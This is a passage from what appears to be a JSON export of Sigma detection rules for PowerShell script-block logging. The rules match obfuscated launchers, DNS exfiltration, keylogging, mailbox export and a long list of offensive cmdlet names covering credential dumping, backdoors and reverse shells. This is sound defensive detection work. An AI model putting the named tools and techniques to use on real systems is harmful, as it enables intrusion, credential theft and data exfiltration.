selection_*\nfalsepositives:\n    - Installation of unsigned packages for testing purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml",
    "content": "title: Execute Invoke-command on Remote Host\nid: 7b836d7f-179c-4ba4-90a7-a7e60afb48e6\nstatus: test\ndescription: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.4\nauthor: frack113\ndate: 2022-01-07\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains|all:\n            - 'invoke-command '\n            - ' -ComputerName '\n    condition: selection_cmdlet\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml",
    "content": "title: Powershell DNSExfiltration\nid: d59d7842-9a21-4bc6-ba98-64bfe0091355\nstatus: test\ndescription: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh\n    - https://github.com/Arno0x/DNSExfiltrator\nauthor: frack113\ndate: 2022-01-07\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        - ScriptBlockText|contains: 'Invoke-DNSExfiltrator'\n        - ScriptBlockText|contains|all:\n              - ' -i '\n              - ' -d '\n              - ' -p '\n              - ' -doh '\n              - ' -t '\n    condition: selection_cmdlet\nfalsepositives:\n    - Legitimate script\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - PowerShell\nid: 73e67340-0d25-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: 'cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell\nid: 1b9dc62e-6e9e-42a3-8990-94d7a10007f7\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: 'Daniel Bohannon (@Mandiant/@FireEye), oscd.community'\ndate: 2019-11-08\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_iex:\n        - ScriptBlockText|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ScriptBlockText|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ScriptBlockText|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ScriptBlockText|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ScriptBlockText|re: '\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ScriptBlockText|re: '\\$VerbosePreference\\.ToString\\('\n    condition: selection_iex\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - Powershell\nid: 779c8c12-0eb1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: 'cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - PowerShell\nid: 0adfbc14-0ed1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: 'cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell\nid: 20e5497e-331c-4cd5-8d36-935f6e2a9a07\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n        ScriptBlockText|contains:\n            - 'system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n        ScriptBlockText|endswith: 'readtoend'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell\nid: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0\nstatus: test\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml",
    "content": "title: Invoke-Obfuscation Via Stdin - Powershell\nid: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - Powershell\nid: db92dd33-a3ad-49cf-8c2c-608c3e30ace0\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: '(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - PowerShell\nid: e55a5195-4724-480e-a77e-3ebe64bd3759\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-08\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32 - PowerShell\nid: a5a30a6e-75ca-4233-8b8c-42e0f2037d3b\nstatus: test\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009\nauthor: Nikita Nazarov, oscd.community\ndate: 2019-10-08\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ScriptBlockText|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell\nid: e54f5149-6ba3-49cf-b153-070d24679126\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2024-04-05\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_4104:\n        ScriptBlockText|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c' # FPs with |\\/r\n    condition: selection_4104\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_keylogging.yml",
    "content": "title: Powershell Keylogging\nid: 34f90d3c-c297-49e9-b26d-911b05a4866c\nstatus: test\ndescription: Adversaries may log user keystrokes to intercept credentials as the user types them.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1\nauthor: frack113\ndate: 2021-07-30\nmodified: 2022-07-11\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_basic:\n        ScriptBlockText|contains: 'Get-Keystrokes'\n    selection_high: # want to run in background and keyboard\n        ScriptBlockText|contains|all:\n            - 'Get-ProcAddress user32.dll GetAsyncKeyState'\n            - 'Get-ProcAddress user32.dll GetForegroundWindow'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_localuser.yml",
    "content": "title: Powershell LocalAccount Manipulation\nid: 4fdc44df-bfe9-4fcc-b041-68f5a2d3031c\nstatus: test\ndescription: |\n    Adversaries may manipulate accounts to maintain access to victim systems.\n    Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1\nauthor: frack113\ndate: 2021-12-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Disable-LocalUser'\n            - 'Enable-LocalUser'\n            - 'Get-LocalUser'\n            - 'Set-LocalUser'\n            - 'New-LocalUser'\n            - 'Rename-LocalUser'\n            - 'Remove-LocalUser'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml",
    "content": "title: Suspicious PowerShell Mailbox Export to Share - PS\nid: 4a241dea-235b-4a7e-8d76-50d817b146c4\nrelated:\n    - id: 889719ef-dd62-43df-86c3-768fb08dc7c0\n      type: derived\nstatus: test\ndescription: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2481\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\n    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\ntags:\n    - attack.exfiltration\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-MailboxExportRequest'\n            - ' -Mailbox '\n            - ' -FilePath \\\\\\\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml",
    "content": "title: Malicious PowerShell Commandlets - ScriptBlock\nid: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\nrelated:\n    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c\n      type: similar\n    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc\n      type: similar\n    - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf\n      type: obsolete\n    - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e\n      type: obsolete\nstatus: test\ndescription: Detects Commandlet names from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\n    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries\n    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1\n    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1\n    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1\n    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1\n    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec\n    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec\n    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare\n    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1\n    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html\n    - https://github.com/HarmJ0y/DAMP\n    - https://github.com/samratashok/nishang\n    - https://github.com/DarkCoderSc/PowerRunAsSystem/\n    - https://github.com/besimorhino/powercat\n    - https://github.com/Kevin-Robertson/Powermad\n    - https://github.com/adrecon/ADRecon\n    - https://github.com/adrecon/AzureADRecon\n    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/\n    - https://github.com/Arno0x/DNSExfiltrator/\nauthor: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer\ndate: 2017-03-05\nmodified: 2025-12-10\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1482\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\n    - attack.t1069.001\n    - attack.t1069.002\n    - attack.t1069\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            # Note: Please ensure alphabetical order when adding new entries\n            - 'Add-Exfiltration'\n            - 'Add-Persistence'\n            - 'Add-RegBackdoor'\n            - 'Add-RemoteRegBackdoor'\n            - 'Add-ScrnSaveBackdoor'\n            - 'ConvertTo-Rc4ByteStream'\n            - 'Decrypt-Hash'\n            - 'Disable-ADIDNSNode'\n            - 'Do-Exfiltration'\n            - 'Enable-ADIDNSNode'\n            - 'Enabled-DuplicateToken'\n            - 'Exploit-Jboss'\n            - 'Export-ADRCSV'\n            - 'Export-ADRExcel'\n            - 'Export-ADRHTML'\n            - 'Export-ADRJSON'\n            - 'Export-ADRXML'\n            - 'Find-Fruit'\n            - 'Find-GPOLocation'\n            - 'Find-TrustedDocuments'\n            - 'Get-ADIDNSNodeAttribute'\n            - 'Get-ADIDNSNodeOwner'\n            - 'Get-ADIDNSNodeTombstoned'\n            - 'Get-ADIDNSPermission'\n            - 'Get-ADIDNSZone'\n            - 'Get-ChromeDump'\n            - 'Get-ClipboardContents'\n            - 'Get-FoxDump'\n            - 'Get-GPPPassword'\n            - 'Get-IndexedItem'\n            - 'Get-KerberosAESKey'\n            - 'Get-Keystrokes'\n            - 'Get-LSASecret'\n            - 'Get-PassHashes'\n            - 'Get-RegAlwaysInstallElevated'\n            - 'Get-RegAutoLogon'\n            - 'Get-RemoteBootKey'\n            - 'Get-RemoteCachedCredential'\n            - 'Get-RemoteLocalAccountHash'\n            - 'Get-RemoteLSAKey'\n            - 'Get-RemoteMachineAccountHash'\n            - 'Get-RemoteNLKMKey'\n            - 'Get-RickAstley'\n            - 'Get-SecurityPackages'\n            - 'Get-ServiceFilePermission'\n            - 'Get-ServicePermission'\n            - 'Get-ServiceUnquoted'\n            - 'Get-SiteListPassword'\n            - 'Get-System'\n            - 'Get-TimedScreenshot'\n            - 'Get-UnattendedInstallFile'\n            - 'Get-Unconstrained'\n            - 'Get-USBKeystrokes'\n            - 'Get-VaultCredential'\n            - 'Get-VulnAutoRun'\n            - 'Get-VulnSchTask'\n            - 'Grant-ADIDNSPermission'\n            - 'Gupt-Backdoor'\n            - 'Invoke-ACLScanner'\n            - 'Invoke-ADRecon'\n            - 'Invoke-ADSBackdoor'\n            - 'Invoke-AgentSmith'\n            - 'Invoke-AllChecks'\n            - 'Invoke-ARPScan'\n            - 'Invoke-AzureHound'\n            - 'Invoke-BackdoorLNK'\n            - 'Invoke-BadPotato'\n            - 'Invoke-BetterSafetyKatz'\n            - 'Invoke-BypassUAC'\n            - 'Invoke-Carbuncle'\n            - 'Invoke-Certify'\n            - 'Invoke-ConPtyShell'\n            - 'Invoke-CredentialInjection'\n            - 'Invoke-DAFT'\n            - 'Invoke-DCSync'\n            - 'Invoke-DinvokeKatz'\n            - 'Invoke-DllInjection'\n            - 'Invoke-DNSUpdate'\n            - 'Invoke-DNSExfiltrator'\n            - 'Invoke-DomainPasswordSpray'\n            - 'Invoke-DowngradeAccount'\n            - 'Invoke-EgressCheck'\n            - 'Invoke-Eyewitness'\n            - 'Invoke-FakeLogonScreen'\n            - 'Invoke-Farmer'\n            - 'Invoke-Get-RBCD-Threaded'\n            - 'Invoke-Gopher'\n            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX\n            - 'Invoke-HandleKatz'\n            - 'Invoke-ImpersonatedProcess'\n            - 'Invoke-ImpersonateSystem'\n            - 'Invoke-InteractiveSystemPowerShell'\n            - 'Invoke-Internalmonologue'\n            - 'Invoke-Inveigh'\n            - 'Invoke-InveighRelay'\n            - 'Invoke-KrbRelay'\n            - 'Invoke-LdapSignCheck'\n            - 'Invoke-Lockless'\n            - 'Invoke-MalSCCM'\n            - 'Invoke-Mimikatz'\n            - 'Invoke-Mimikittenz'\n            - 'Invoke-MITM6'\n            - 'Invoke-NanoDump'\n            - 'Invoke-NetRipper'\n            - 'Invoke-Nightmare'\n            - 'Invoke-NinjaCopy'\n            - 'Invoke-OfficeScrape'\n            - 'Invoke-OxidResolver'\n            - 'Invoke-P0wnedshell'\n            - 'Invoke-Paranoia'\n            - 'Invoke-PortScan'\n            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps\n            - 'Invoke-PostExfil'\n            - 'Invoke-PowerDump'\n            - 'Invoke-PowerDPAPI'\n            - 'Invoke-PowerShellTCP'\n            - 'Invoke-PowerShellWMI'\n            - 'Invoke-PPLDump'\n            - 'Invoke-PsExec'\n            - 'Invoke-PSInject'\n            - 'Invoke-PsUaCme'\n            - 'Invoke-ReflectivePEInjection'\n            - 'Invoke-ReverseDNSLookup'\n            - 'Invoke-Rubeus'\n            - 'Invoke-RunAs'\n            - 'Invoke-SafetyKatz'\n            - 'Invoke-SauronEye'\n            - 'Invoke-SCShell'\n            - 'Invoke-Seatbelt'\n            - 'Invoke-ServiceAbuse'\n            - 'Invoke-ShadowSpray'\n            - 'Invoke-Sharp' # Covers all \"Invoke-Sharp\" variants\n            - 'Invoke-Shellcode'\n            - 'Invoke-SMBScanner'\n            - 'Invoke-Snaffler'\n            - 'Invoke-Spoolsample'\n            - 'Invoke-SpraySinglePassword'\n            - 'Invoke-SSHCommand'\n            - 'Invoke-StandIn'\n            - 'Invoke-StickyNotesExtract'\n            - 'Invoke-SystemCommand'\n            - 'Invoke-Tasksbackdoor'\n            - 'Invoke-Tater'\n            - 'Invoke-Thunderfox'\n            - 'Invoke-ThunderStruck'\n            - 'Invoke-TokenManipulation'\n            - 'Invoke-Tokenvator'\n            - 'Invoke-TotalExec'\n            - 'Invoke-UrbanBishop'\n            - 'Invoke-UserHunter'\n            - 'Invoke-VoiceTroll'\n            - 'Invoke-Whisker'\n            - 'Invoke-WinEnum'\n            - 'Invoke-winPEAS'\n            - 'Invoke-WireTap'\n            - 'Invoke-WmiCommand'\n            - 'Invoke-WMIExec'\n            - 'Invoke-WScriptBypassUAC'\n            - 'Invoke-Zerologon'\n            - 'MailRaider'\n            - 'New-ADIDNSNode'\n            - 'New-HoneyHash'\n            - 'New-InMemoryModule'\n            - 'New-SOASerialNumberArray'\n            - 'Out-Minidump'\n            - 'PowerBreach'\n            - 'powercat '\n            - 'PowerUp'\n            - 'PowerView'\n            - 'Remove-ADIDNSNode'\n            - 'Remove-Update'\n            - 'Rename-ADIDNSNode'\n            - 'Revoke-ADIDNSPermission'\n            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner\n            - 'Show-TargetScreen'\n            - 'Start-CaptureServer'\n            - 'Start-Dnscat2'\n            - 'Start-WebcamRecorder'\n            - 'VolumeShadowCopyTools'\n            # - 'Check-VM'\n            # - 'Disable-MachineAccount'\n            # - 'Enable-MachineAccount'\n            # - 'Get-ApplicationHost'\n            # - 'Get-MachineAccountAttribute'\n            # - 'Get-MachineAccountCreator'\n            # - 'Get-Screenshot'\n            # - 'HTTP-Login'\n            # - 'Install-ServiceBinary'\n            # - 'Install-SSP'\n            # - 'New-DNSRecordArray'\n            # - 'New-MachineAccount'\n            # - 'Port-Scan'\n            # - 'Remove-MachineAccount'\n            # - 'Set-MacAttribute'\n            # - 'Set-MachineAccountAttribute'\n            # - 'Set-Wallpaper'\n    filter_optional_amazon_ec2:\n        ScriptBlockText|contains:\n            - Get-SystemDriveInfo  # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1\n            - C:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\  # false positive form Amazon EC2\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml",
    "content": "title: Malicious PowerShell Keywords\nid: f62176f3-8128-4faa-bf6c-83261322e5eb\nstatus: test\ndescription: Detects keywords from well-known PowerShell exploitation frameworks\nreferences:\n    - https://adsecurity.org/?p=2921\nauthor: Sean Metcalf (source), Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-06-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'AdjustTokenPrivileges'\n            - 'IMAGE_NT_OPTIONAL_HDR64_MAGIC'\n            # - 'LSA_UNICODE_STRING'\n            - 'Metasploit'\n            - 'Microsoft.Win32.UnsafeNativeMethods'\n            - 'Mimikatz'\n            - 'MiniDumpWriteDump'\n            - 'PAGE_EXECUTE_READ'\n            - 'ReadProcessMemory.Invoke'\n            - 'SE_PRIVILEGE_ENABLED'\n            - 'SECURITY_DELEGATION'\n            - 'TOKEN_ADJUST_PRIVILEGES'\n            - 'TOKEN_ALL_ACCESS'\n            - 'TOKEN_ASSIGN_PRIMARY'\n            - 'TOKEN_DUPLICATE'\n            - 'TOKEN_ELEVATION'\n            - 'TOKEN_IMPERSONATE'\n            - 'TOKEN_INFORMATION_CLASS'\n            - 'TOKEN_PRIVILEGES'\n            - 'TOKEN_QUERY'\n    condition: selection\nfalsepositives:\n    - Depending on the scripts, this rule might require some initial tuning to fit the environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml",
